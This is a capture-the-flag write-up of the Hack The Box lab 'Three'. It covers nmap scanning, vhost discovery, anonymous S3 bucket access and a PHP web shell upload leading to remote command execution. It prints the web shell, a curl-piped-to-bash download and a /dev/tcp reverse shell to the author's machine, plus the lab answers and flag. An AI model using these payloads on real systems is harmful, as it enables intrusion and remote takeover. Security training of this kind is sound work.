Three (Tier 1)

Description

  • Tier -> 1

  • Difficult -> Very Easy

  • OS -> Linux

  • Tags -> Cloud / Custom Applications / AWS / Reconnaissance / Web Site Structure Discovery / Bucket Enumeration / Arbitrary File Upload / Anonymous-Guest Access

https://app.hackthebox.com/starting-point?tier=1

Write-up

  • I started doing an initial scan using Nmap

nmap -p- -Pn --min-rate 2000 10.129.246.158

  • With this, I answered the first question

Answer: 2

  • Then I did an exhaustive scan to know more about the services running on the open ports

nmap -p22,80 -sVC 10.129.246.158

  • As I found the HTTP protocol running on port 80, I went to the browser to check the deployed content. I found what seemed to be a contact page for a band. Navigating through the site, I didn't find anything relevant apart from an email in the Contact section with a curious domain

To learn more about the HTTP protocol you can go here

  • With this and a little research, I answered the next questions

Answer: thetoppers.htb

Answer: /etc/hosts

  • As this domain could be relevant, I added it to the known hosts by editing the /etc/hosts file. Not getting anything relevant from the web page, I tried using the Gobuster tool to fuzz the page and find any possible hidden routes. In this case, I enumerated the found domain to check if there were any related subdomains. With that, I found the subdomain s3.thetoppers.htb existed, and with a little research, I learned it was related to a cloud database on the Amazon servers

echo "10.129.246.158 thetoppers.htb" | sudo tee -a /etc/hosts
gobuster vhost -u http://thetoppers.htb/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

  • With this information and a little research about Amazon services, I answered the next questions

Answer: s3.thetoppers.htb

Answer: Amazon S3

Answer: awscli

Answer: aws configure

Answer: aws s3 ls

  • I also added the discovered subdomain to the known hosts to work properly with it

echo "10.129.246.158 s3.thetoppers.htb" | sudo tee -a /etc/hosts

  • So knowing this was an AWS service, I tried to connect to it using the awscli utility. First, I configured the tool, in this case, indicating a temporary connection with the temp value. With this done I tried to list the S3 instances and found one named thetoppers.htb. Then I listed the elements inside it and found an index.php file, which could be the source code of the web page

aws configure
aws --endpoint=http://s3.thetoppers.htb s3 ls
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

The temp value is the default credentials for AWS connections if everything is scaped

  • With this, I answered the next question

Answer: PHP

  • Then as I had a connection to the S3 instance, I tried to upload a custom file to the bucket in an attempt to gain RCE. To do so, I created a Shell.php file with a proper payload to spawn a shell on the machine and read a command. Then I uploaded it and checked if it had worked by listing the contents of the bucket again

sudo nano Shell.php
Shell.php
<?php system($_GET["cmd"]); ?>
aws --endpoint=http://s3.thetoppers.htb s3 cp Shell.php s3://thetoppers.htb
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

  • After that, I accessed the bucket direction from the browser and tried to send a command using the cmd parameter as set on the payload. I saw the server executed it properly and confirmed I have gained RCE

http://thetoppers.htb/Shell.php?cmd=id

  • With this, I could explore the filesystem arbitrarily. After some searching, I decided to check the /var/www folder, which usually is the default for the server files, and there I found a flag.txt file. Finally, retrieved the content of the file and got the flag

http://thetoppers.htb/Shell.php?cmd=ls /var/www
http://thetoppers.htb/Shell.php?cmd=cat /var/www/flag.txt

  • With this, I got the root flag and pwned the machine

Answer: a980d99281a28d638ac68b9bf9453c2b

Alternative Reverse Shell

Instead of abusing the RCE directly on the browser, I tried to get a Reverse Shell on the machine

  • First, I created a simple bash script to send the shell connection to my machine

sudo nano shell.sh
shell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.195/1234 0>&1  
#I used the my IP on the VPN and an arbitrary port

  • Then I established a Netcat listener on the arbitrary port chosen above

nc -nvlp 1234

  • After this, in another terminal, I established an HTTP server using Python in the same folder where the shell.sh file is, and setting another arbitrary port for the server

python -m http.server 4444

  • I used the RCE to send the shell from the target to my machine using the curl command. I observed the page remained loading and checking the Python server received the petition

http://thetoppers.htb/Shell.php?cmd=curl%2010.10.14.195:4444/shell.sh|bash

  • Finally, I checked the Netcat listener and saw that I had gained a shell from the machine. With that, I could interact with the system more comfortably

PreviousResponder (Tier 1)NextIgnition (Tier 1)

Last updated